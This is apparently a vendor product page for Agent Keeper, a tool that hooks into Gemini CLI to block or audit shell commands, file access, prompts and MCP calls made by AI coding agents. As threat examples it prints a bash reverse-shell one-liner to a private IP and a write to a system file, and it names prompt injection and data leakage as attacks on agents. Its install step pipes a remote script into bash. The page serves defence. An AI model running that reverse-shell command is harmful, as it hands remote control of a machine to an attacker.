Agent Keeper

Gemini CLI security

Put Gemini CLI inside your agent security perimeter.

Agent Keeper turns Gemini CLI hooks into enforceable controls for shell commands, file reads and writes, prompt submissions, web access, and MCP tool calls.

Protect Gemini CLISetup guide

Runtime action stream

Gemini CLI

gemini
1

Shell commands

BeforeTool / run_shell_command

Block or allow
2

File writes

BeforeTool / write_file

Path policy
3

File edits

BeforeTool / replace

Path policy
4

File reads

BeforeTool / read_file

Audit or block

Why teams buy it

Gemini CLI gets the same control plane as the rest of your agent fleet.

Use Gemini's synchronous hook points to validate tool arguments before execution.

Return deterministic blocks for dangerous writes, credential access, prompt injection, and risky commands.

Give platform teams one dashboard for Gemini CLI beside Codex, Claude Code, Cursor, Copilot, Windsurf, and Cowork.

Carry host, machine, session, tool, verdict, and policy context into the Activity and Security views.

Coverage

Hooks become enforceable security controls.

ActionSignalResult
Shell commandsBeforeTool / run_shell_commandBlock or allow
File writesBeforeTool / write_filePath policy
File editsBeforeTool / replacePath policy
File readsBeforeTool / read_fileAudit or block
User promptsBeforeAgentDetect injection
MCP tool callsmcp__server__toolSkill policy

Threat coverage

Stop the agent behaviors attackers actually try.

Unsafe file writes

Prevent Gemini CLI from writing secrets, launch agents, deploy hooks, or system-level files.

write_file /etc/agentkeeper-e2e.conf

Reverse shells

Block commands that open outbound shells or turn development laptops into pivot points.

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

MCP data leakage

Apply server and tool allowlists before Gemini invokes external MCP integrations.

mcp__drive__read_file customer-export.csv

Install

One command, source-attributed events.

The installer writes the hook config, routes decisions through Runtime Shield, and labels events as gemini so security teams can filter by agent.

terminal
bash <(curl -fsSL "$AGENTKEEPER_API_URL/install-hooks.sh") --ide gemini

Uses the same org policies as Claude Code, Cursor, Copilot, Windsurf, and Cowork.

Fails open on local outages while preserving API-backed audit history.

Feeds the Activity, Security, and Workstations views immediately after the first event.